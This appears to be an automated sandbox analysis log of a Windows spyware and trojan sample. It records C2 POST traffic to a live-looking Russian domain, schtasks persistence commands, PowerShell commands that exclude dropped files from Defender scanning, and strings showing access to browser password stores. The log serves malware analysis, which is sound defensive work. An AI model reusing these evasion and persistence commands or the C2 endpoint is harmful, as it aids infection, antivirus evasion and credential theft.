Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1040Expect: 100-continue

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 143840cm.nyashteam.ru

Source: unknown

HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: svchost.exe, 00000032.00000003.1974959177.000001330EC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000032.00000003.1974959177.000001330EC18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000032.00000003.1974959177.000001330EC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000032.00000003.1974959177.000001330EC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000032.00000003.1974959177.000001330EC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.50.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000018.00000002.3222117287.0000018C10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.1935191683.0000018C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18FAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4Awb1u1GcJ.exe, 00000000.00000002.1813149962.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1935191683.0000018C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18F8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.1935191683.0000018C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18FAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: X54FKLunGc.48.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000018.00000002.1935191683.0000018C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1953889507.000001F019B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1926353428.0000021C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1946396201.0000025638121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1947896487.000001C18F8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1950774668.0000021F39C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: X54FKLunGc.48.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: X54FKLunGc.48.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: X54FKLunGc.48.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: X54FKLunGc.48.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: X54FKLunGc.48.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: X54FKLunGc.48.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000032.00000003.1974959177.000001330ED1A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000032.00000003.1974959177.000001330ECA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1974959177.000001330ECF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1974959177.000001330ECE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000021.00000002.1950774668.0000021F39EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.3222117287.0000018C10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3177174189.0000021C90075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000032.00000003.1974959177.000001330ECC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.50.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000032.00000003.1974959177.000001330EC56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://support.mozilla.org
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: X54FKLunGc.48.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: X54FKLunGc.48.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: j11z8HEtiF.48.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BAB0D77	0_2_00007FFD9BAB0D77
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEA195A	0_2_00007FFD9BEA195A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 49_2_00007FFD9BAD0D77	49_2_00007FFD9BAD0D77
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAC0B3F	51_2_00007FFD9BAC0B3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAC0000	51_2_00007FFD9BAC0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAC00D3	51_2_00007FFD9BAC00D3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAB0D77	51_2_00007FFD9BAB0D77
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAE14E5	51_2_00007FFD9BAE14E5
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 52_2_00007FFD9BAA0D77	52_2_00007FFD9BAA0D77
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Code function: 53_2_00007FFD9BAC0D77	53_2_00007FFD9BAC0D77
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAC0B3F	54_2_00007FFD9BAC0B3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAC0000	54_2_00007FFD9BAC0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAC00D3	54_2_00007FFD9BAC00D3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAE14E5	54_2_00007FFD9BAE14E5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAB0D77	54_2_00007FFD9BAB0D77
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 55_2_00007FFD9BAF14E5	55_2_00007FFD9BAF14E5
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 55_2_00007FFD9BAD0B3F	55_2_00007FFD9BAD0B3F
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 55_2_00007FFD9BAD0000	55_2_00007FFD9BAD0000
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 55_2_00007FFD9BAD00D3	55_2_00007FFD9BAD00D3
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 55_2_00007FFD9BAC0D77	55_2_00007FFD9BAC0D77

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\IETDQDzo.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97

Source: 4Awb1u1GcJ.exe, 00000000.00000000.1664770511.0000000000A42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000000.00000002.1897763855.000000001BF8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000000.00000002.1897763855.000000001BF8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000026.00000002.2584844678.00000000031EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartup vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000026.00000002.2584844678.0000000003152000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000026.00000002.2584844678.0000000003140000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000026.00000002.2584844678.0000000003209000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000028.00000002.2530166780.00000000034B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000028.00000002.2530166780.0000000003579000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000028.00000002.2530166780.00000000034CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartup vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000028.00000002.2530166780.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000034.00000002.2227652433.0000000003170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000037.00000002.2535836860.0000000003540000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000037.00000002.2535836860.0000000003609000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000037.00000002.2535836860.0000000003552000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe, 00000037.00000002.2535836860.000000000355C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartup vs 4Awb1u1GcJ.exe
Source: 4Awb1u1GcJ.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4Awb1u1GcJ.exe

Source: 4Awb1u1GcJ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 4Awb1u1GcJ.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hxpWOXgnBGVLArPcwqxpuA.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hxpWOXgnBGVLArPcwqxpuA.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hxpWOXgnBGVLArPcwqxpuA.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/77@1/2

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

File created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

File created: C:\Users\user\Desktop\greisgmx.log

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Mutant created: NULL
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-8ilaaP4rfi4CjOHXKSzR
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

File created: C:\Users\user\AppData\Local\Temp\lmfl24ds

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat"

Source: 4Awb1u1GcJ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4Awb1u1GcJ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4QeE6ZCpTU.48.dr, Kqg9KuU8rg.48.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 4Awb1u1GcJ.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

File read: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4Awb1u1GcJ.exe "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1D7.tmp" "c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP"
Source: unknown	Process created: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Source: unknown	Process created: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
